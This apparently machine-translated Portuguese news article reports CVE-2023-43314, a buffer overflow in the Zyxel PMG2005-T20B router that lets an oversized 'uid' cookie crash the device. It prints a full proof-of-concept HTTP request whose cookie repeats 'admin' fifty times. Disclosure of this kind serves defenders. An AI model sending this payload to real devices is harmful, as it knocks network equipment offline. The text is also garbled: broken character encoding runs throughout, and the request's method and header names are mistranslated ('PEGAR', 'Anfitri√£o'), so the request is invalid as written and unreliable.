Notícias de dispositivos móveis, gadgets, aplicativos Android

Vulnerabilidade ZYXEL Buffer Overflow permite que o invasor inicie um ataque DoS

ZYXEL foi descoberto com uma vulnerabilidade de buffer overflow em seu dispositivo ZYXEL-PMG2005-T20B, que pode resultar em uma condição de negação de serviço. Esta condição existe devido à limpeza inadequada da entrada fornecida pelo usuário em sua solicitação HTTP.

Zyxel é uma empresa multinacional taiwanesa que fabrica diversos produtos de rede como roteadores, CPE DSL, sistemas WiFi, CPE 5G NR/4G LTE, switches de operadora e acesso, extensores de rede e dispositivos de gerenciamento de rede.

Análise técnica

Um agente de amea√ßa pode explorar esta vulnerabilidade fornecendo um script elaborado para o par√Ęmetro uid no cgi-bin/login.asp, levando a um buffer overflow, eventualmente causando a condi√ß√£o DoS. Esta vulnerabilidade foi atribu√≠da ao CVE como CVE-2023-43314 e a gravidade est√° sendo analisada.

Documento

Esta vulnerabilidade surge no produto ZYXEL-PMG2005-T20B quando o n√ļmero de administradores no uid excede o limite m√°ximo de 50, o que trava o aplicativo quando analisado no backend. Al√©m disso, o cabe√ßalho COOKIE na solicita√ß√£o HTTP √© fornecido com um par√Ęmetro SESSIONID para criar uma sess√£o v√°lida com o produto ZYXEL.

No entanto, an√°lises adicionais revelaram que o produto ZYXEL-PMG2005-T20B atingiu o fim da vida √ļtil de acordo com o site da ZyXEL.

O pesquisador criou uma solicita√ß√£o HTTP para replicar esta vulnerabilidade com os seguintes par√Ęmetros e valores.

PEGAR /cgi-bin/index.asp HTTP/1.1
Anfitri√£o: {IP DO HOST}
Solicita√ß√Ķes inseguras de atualiza√ß√£o: 1
Agente do usu√°rio: Mozilla/5.0 (Windows TE 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, como Gecko) Chrome/109.0.5414.120 Saf√°ri/537.36
Aceitar: text/html,application/xhtml+xml,application/xml;q=0.9,imagem/avif,imagem/webp,imagem/apng,/;q=0.8,aplicativo/troca assinada;v=b3;q=0.9
Referente: http://{HOST IP}/cgi-bin/login.asp
Aceitar codificação: gzip, deflate
Idioma de aceitação: zh-CN,zh;q=0.9
Cookie: SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234
Conex√£o: fechar

Esta solicita√ß√£o ao produto ZyXEL causa o buffer overflow devido ao n√ļmero de limites de administra√ß√£o resultando na condi√ß√£o de nega√ß√£o de servi√ßo. Al√©m disso, mais de 20 URLs foram listadas pelo pesquisador de seguran√ßa, que foram afetadas pela mesma vulnerabilidade.

N√≥s recomendamos:  4 Melhores aplicativos de videoconfer√™ncia para download

A Reposit√≥rio GitHubjuntamente com o prova de conceito foi publicado, que fornece informa√ß√Ķes detalhadas sobre esta vulnerabilidade, sua exist√™ncia e outras informa√ß√Ķes.

Recomenda-se que os usu√°rios deste produto ZyXEL atualizem para a vers√£o mais recente do produto para evitar que esta vulnerabilidade seja explorada.